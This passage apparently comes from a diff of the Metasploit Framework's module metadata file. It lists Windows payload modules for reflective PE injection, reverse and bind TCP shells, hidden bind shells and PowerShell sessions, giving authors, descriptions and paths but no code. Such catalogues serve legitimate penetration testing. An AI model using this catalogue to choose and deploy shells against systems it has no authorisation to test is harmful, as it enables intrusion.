Also PE files which use resource loading might crash.\nListen for a connection (No NX)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/peinject/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_windows/peinject/bind_tcp": { - "name": "Windows Inject PE Files, Bind TCP Stager (Windows x86)", - "fullname": "payload/windows/peinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for a connection (Windows x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/peinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_tcp" - }, - "payload_windows/peinject/bind_tcp_rc4": { - "name": "Windows Inject PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/peinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for a connection", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/peinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_windows/peinject/bind_tcp_uuid": { - "name": "Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/peinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for a connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/peinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_windows/peinject/find_tag": { - "name": "Windows Inject PE Files, Find Tag Ordinal Stager", - "fullname": "payload/windows/peinject/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "skape " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nUse an established connection", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/findtag_ord.rb", - "is_install_path": true, - "ref_name": "windows/peinject/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/findtag_ord" - }, - "payload_windows/peinject/reverse_ipv6_tcp": { - "name": "Windows Inject PE Files, Reverse TCP Stager (IPv6)", - "fullname": "payload/windows/peinject/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker over IPv6", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_windows/peinject/reverse_named_pipe": { - "name": "Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/windows/peinject/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "OJ Reeves" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_named_pipe" - }, - "payload_windows/peinject/reverse_nonx_tcp": { - "name": "Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/windows/peinject/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "vlad902 " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker (No NX)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_windows/peinject/reverse_ord_tcp": { - "name": "Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/windows/peinject/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "spoonm " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_windows/peinject/reverse_tcp": { - "name": "Windows Inject PE Files, Reverse TCP Stager", - "fullname": "payload/windows/peinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp" - }, - "payload_windows/peinject/reverse_tcp_allports": { - "name": "Windows Inject PE Files, Reverse All-Port TCP Stager", - "fullname": "payload/windows/peinject/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_windows/peinject/reverse_tcp_dns": { - "name": "Windows Inject PE Files, Reverse TCP Stager (DNS)", - "fullname": "payload/windows/peinject/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf ", - "RageLtMan" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_windows/peinject/reverse_tcp_rc4": { - "name": "Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/peinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_windows/peinject/reverse_tcp_rc4_dns": { - "name": "Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/windows/peinject/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_windows/peinject/reverse_tcp_uuid": { - "name": "Windows Inject PE Files, Reverse TCP Stager with UUID Support", - "fullname": "payload/windows/peinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nConnect back to the attacker with UUID Support", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/peinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_windows/pingback_bind_tcp": { - "name": "Windows x86 Pingback, Bind TCP Inline", - "fullname": "payload/windows/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7" - ], - "description": "Open a socket and report UUID when a connection is received (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/pingback_bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/pingback_reverse_tcp": { - "name": "Windows x86 Pingback, Reverse TCP Inline", - "fullname": "payload/windows/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7" - ], - "description": "Connect back to attacker and report UUID (Windows x86)", - "references": [], - 
"platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/pingback_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/powershell_bind_tcp": { - "name": "Windows Interactive Powershell Session, Bind TCP", - "fullname": "payload/windows/powershell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ben Turner", - "Dave Hardy", - "vlad902 ", - "sf " - ], - "description": "Listen for a connection and spawn an interactive powershell session", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/powershell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/powershell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/powershell_reverse_tcp": { - "name": "Windows Interactive Powershell Session, Reverse TCP", - "fullname": "payload/windows/powershell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ben Turner", - "Dave Hardy", - "vlad902 ", - "sf " - ], - "description": "Listen for a connection and spawn an interactive powershell session", - "references": [ - 
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/payloads/singles/windows/powershell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/powershell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/powershell_reverse_tcp_ssl": { - "name": "Windows Interactive Powershell Session, Reverse TCP SSL", - "fullname": "payload/windows/powershell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ben Turner", - "Dave Hardy", - "vlad902 ", - "sf " - ], - "description": "Listen for a connection and spawn an interactive powershell session over SSL", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/payloads/singles/windows/powershell_reverse_tcp_ssl.rb", - "is_install_path": true, - "ref_name": "windows/powershell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/shell/bind_hidden_ipknock_tcp": { - "name": "Windows Command Shell, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/windows/shell/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - 
"description": "Spawn a piped command shell (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_windows/shell/bind_hidden_tcp": { - "name": "Windows Command Shell, Hidden Bind TCP Stager", - "fullname": "payload/windows/shell/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Spawn a piped command shell (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell/bind_hidden_tcp", - "check": 
false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_windows/shell/bind_ipv6_tcp": { - "name": "Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/windows/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape " - ], - "description": "Spawn a piped command shell (staged).\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_windows/shell/bind_ipv6_tcp_uuid": { - "name": "Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape ", - "OJ Reeves" - ], - "description": "Spawn a piped command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": 
"/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_windows/shell/bind_named_pipe": { - "name": "Windows Command Shell, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/windows/shell/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "UserExistsError" - ], - "description": "Spawn a piped command shell (staged).\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/shell/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_windows/shell/bind_nonx_tcp": { - "name": "Windows Command Shell, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/windows/shell/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "vlad902 " - ], - "description": "Spawn a piped command shell (staged).\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 
11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_windows/shell/bind_tcp": { - "name": "Windows Command Shell, Bind TCP Stager (Windows x86)", - "fullname": "payload/windows/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape " - ], - "description": "Spawn a piped command shell (staged).\n\nListen for a connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_tcp" - }, - "payload_windows/shell/bind_tcp_rc4": { - "name": "Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/shell/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "spoonm ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Spawn a piped command shell (staged).\n\nListen for a connection", - "references": [], - "platform": 